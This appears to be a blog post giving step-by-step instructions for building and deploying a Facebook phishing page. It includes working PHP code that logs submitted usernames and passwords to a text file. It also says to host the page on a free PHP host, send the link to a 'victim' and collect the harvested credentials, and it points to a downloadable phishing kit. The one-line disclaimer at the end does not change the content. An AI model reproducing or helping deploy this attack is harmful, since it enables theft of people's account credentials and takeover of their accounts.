1.Go to the Facebook ,and then right click on the page, u will see the option "view source" page,click on that.
2.Now a new tab will open which contain a source code,Select all the codes and paste it in a notepad.
3.Now open notepad and find action
4.You will have to find a text which looks like
action="https://www.facebook.com/login.php?login_attempt=1"
5.delete all the text written after action= and instead of it write post.php
EXAMPLE-"action="post.php"
6.Now save it on your desktop with the name index.htm,not index.html,remember.
7.Now your phishing page is ready
8.Now u need php code (it is main part )Open a new notepad and save the given data with the name post.php.
<?phpheader ('Location:http://www.facebook.com/');$handle = fopen("usernames.txt", "a");foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in any a web hosting site which supports php script,i prefer u to use www.000webhost.com or www.,my3gb.com.
11.Here i'm using 000webhost because i have an alredy account in it
12.You have to make a account in that ,after that it looks like a picture given below.
13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.
15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .
16.Now the last step click on view of index.htm it will look same as facebook page.
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19.Click on view now u will have your friend's password and email id.
20.This is a simple trick to hack any Facebook password account by phishing page.
21.If you are not able to create a phishing page then i will provide u a video tutorial link,look in to the description of that video u will find a prepared module of phishing pages,download it and enjoy. - YOU CAN DOWNLOAD FACEBOOK PHISSING FILE NO NEED TO DO ANYTHING JUST DOWNLOAD AND UPLOAD FILE TO 00webhost OR any other webhosting site.
note: Phissing is illegal activity.Don't
0 comments:
Post a Comment